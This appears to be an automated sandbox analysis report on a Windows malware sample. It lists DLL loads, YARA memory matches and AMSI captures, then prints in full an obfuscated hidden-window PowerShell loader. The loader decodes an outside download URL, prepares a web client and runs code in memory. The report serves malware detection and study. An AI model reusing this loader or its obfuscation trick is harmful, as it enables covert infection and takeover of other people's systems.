              Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: linkinfo.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntshrui.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cscapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: taskflowdatauser.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cdp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: umpdc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dsreg.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasapi32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasman.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rtutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winhttp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winnsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: schannel.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mskeyprotect.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncrypt.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ncryptsslp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wbemcomn.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: napinsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: pnrpnsp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshbth.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: nlaapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: winrnr.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: propsys.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: profapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: edputil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: urlmon.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: iertutil.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: srvcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: netutils.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: appresolver.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: bcp47langs.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: slc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: userenv.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sppc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: winhttp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: mswsock.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: winnsi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: dnsapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: fwpuclnt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: rasadhlp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: schannel.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: mskeyprotect.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: ntasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: gpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: ncrypt.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: ncryptsslp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: winmm.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: rstrtmgr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wininet.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: pstorec.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: vaultcli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wintypes.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: dpapi.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: pstorec.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: aclayers.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: mpr.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sfc_os.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: wldp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: msasn1.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: sspicli.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\SysWOW64\msiexec.exe  Section loaded: cryptbase.dll
              Source: Window Recorder  Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2417345393.0000000008268000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: msiexec.exe, 00000010.00000002.2590132545.0000000002DC8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.0000000007247000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb0 source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2410836893.00000000071B8000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: Yara match  File source: 00000005.00000002.2419849580.0000000009833000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000005.00000002.2419273887.0000000008590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000002.00000002.2257431898.00000244184D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match  File source: 00000005.00000002.2402221496.0000000005729000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String($Solderistens)$GLobAL:OVERflORid = [SYsTEm.tExt.encOdInG]::AscII.geTStrinG($SammEnFaldeneS)$globAL:ALlElUJa78=$OVeRfLOrId.sUbstRIng($BEGRaVeLSesafTaLe,$kUVerts)<#Beseglingen Pivsures
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: GetDelegateForFunctionPointer((Forbrugerbeskyttende $sagittaries $Teknikumets), (jobsoegning @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Diversionist = [AppDomain]::CurrentDomain.Get
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Skidded)), $Petters).DefineDynamicModule($sollegemes, $false).DefineType($Mazedly, $Esoterical, [System.MulticastDelegate])$Opnormered
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  Anti Malware Scan Interface: FromBase64String($Solderistens)$GLobAL:OVERflORid = [SYsTEm.tExt.encOdInG]::AscII.geTStrinG($SammEnFaldeneS)$globAL:ALlElUJa78=$OVeRfLOrId.sUbstRIng($BEGRaVeLSesafTaLe,$kUVerts)<#Beseglingen Pivsures
              Source: C:\Windows\System32\cmd.exe  Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm In.mPa moSpunrPreitTel aH
              Source: unknown  Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Afstrmningsforholdene Mastigoneme Cuspidine informers Verdensbermthedernes Vandforsyningsresursers Vidneudsagnet #>;$Databger162='Usigelig';<#Receptorernes Preparietal Kavalerers Vernix Eskortere Betalbare #>;$Afgiftssatser=$Machine+$host.UI; function Fyrsternes($Sadlepladser){If ($Afgiftssatser) {$Horological++;}$Krydsfinerplade=$Angstneuroser+$Sadlepladser.'Length'-$Horological; for( $Swatting=4;$Swatting -lt $Krydsfinerplade;$Swatting+=5){$gratulerende=$Swatting;$Renees+=$Sadlepladser[$Swatting];$Fremtidsforskerens='Butenes';}$Renees;}function kaldedes($Teksthistories){ . ($Absolutismes) ($Teksthistories);}$Lively=Fyrsternes ',kelME,eroBaitzMagiiHi hlAcrol Sanadsri/Mose ';$Lively+=Fyrsternes 'Jasp5Feve.Unpa0Ga t Sab.(MoviWM sti,ovinN ordEs uoSk dwTebrs .li HjerNMe.aTbobb Smrb1Ou t0Marg.Skov0Ride;Pac S bvW osihowbnScyb6Test4 F i;Sata Po xHaug6Pl m4 lon;Knit F ndrB ttvStr :ga,p1Ti e3None1 put.S ap0 Led)Out SymbGSvroe Rosc knok Ar oAlab/Vars2 rem0 Da.1guld0I.do0tugt1Fljl0Domm1Jean HydF Regi Ch rHalielsehfGrouoEspaxBli /Tok 1 Urf3Hyra1 Tal.mind0Rapf ';$Hairstylists=Fyrsternes 'AlmuUKrivsFor eAm eRSimu-Kramadel gBor E Amin SubT loc ';$Hypernic=Fyrsternes 'Sy ehLimptVapot AnnpKarbsTand:Supe/Co p/PopupFrmnlSepti T.reBeculUnrit Sard Pro.FejltDataoEkspp Ple/Hov KVoyavGur aNormlGriliJudifistaiDetecWhipeSta rStudeOverdCorreTricsOuvr.Bankq CycxPiondIoej ';$Torsiogram=Fyrsternes 'Soci>Moto ';$Absolutismes=Fyrsternes 'U maifinaE LecxNavn ';$foredragsforeninger='Timetable';$Overwhelmingly='\Unslave.Mel';kaldedes (Fyrsternes 'Todk$ Torg SkrlNon o onbSalgADistluds :EpisFTriveUnivr Teki ,paa SprsObst5 S r= .ro$IsomeA abnCateV Pse:af saUrstPDuckpFedeDAntiAMultTKablA har+fari$GeodoMaimv SkyE HysrKnejwElsdhB ndE,occL oleMvkkeiTabsn PokG BorLInteY r,i ');kaldedes (Fyrsternes 'I in$K,ntg OphlP ojoPertBKar 
aAmatlStol:caviuacrodSlipgVarsI atifslskt Spas KoobR.eueBotthDaasO recvResmeKystTLincsBetr=Vas $OmstHA.urYRu.dPBridESpa.rCitaNBr eI.iliC .sn.ColoSDeviPSlicl UnmiLasttIn e(ager$Lgeet katOReinR PedSRangi Bi OLegeGHe orBiogaAr,em Gro)Boxb ');kaldedes (Fyrsternes 'Opdy[ UnsNLys eAdipTFoge.FalssN,naeSciaREtervGradi AfdCGeepE otopDis.o domIbarynSupeTH poMr craBoerNPiemaBe ngU.dteUpasrMani]Part:T.ul: DemS WalEPterCUdlnu sanRF skIFr sTNediYOmsaP O erDauwOKofiTOutnOFrydcPrveOForkLNost Vio,= utc Poll[Cavan,udeEP,natb ch.RecesTab eBr sCUndiuOmveRCentiK pit TreY .ntPSuper PraO BriT.karOEntrC rbvORestl IneTfolkYMusspHrmoE Hep]Redi:Conn:idmtTKlaslguarStec 1.umo2 Cra ');$Hypernic=$Udgiftsbehovets[0];$Decalcify18=(Fyrsternes '.hit$sak GBodslreemOdes bFremAUnprL abo:SideIStelmSaecM AnaOArborUnenTLejeaUnrelslowI KnaSbackEv luDRota=Bl,aNPostesoapWLbed-UnmaoTen.bB eojKildeUnscCT stTIc c Hy rsHomoYA.beS .agt onaEUn emB.nd.ForunTripeHandT nse.MalewCuerESchfb ImpcBegel po iUnace PinnZooft.kat ');kaldedes ($Decalcify18);kaldedes (Fyrsternes 'Frem$.verIA stm I
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,15_2_004044A4
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD347678A6 push ebx; retf 2_2_00007FFD3476796A
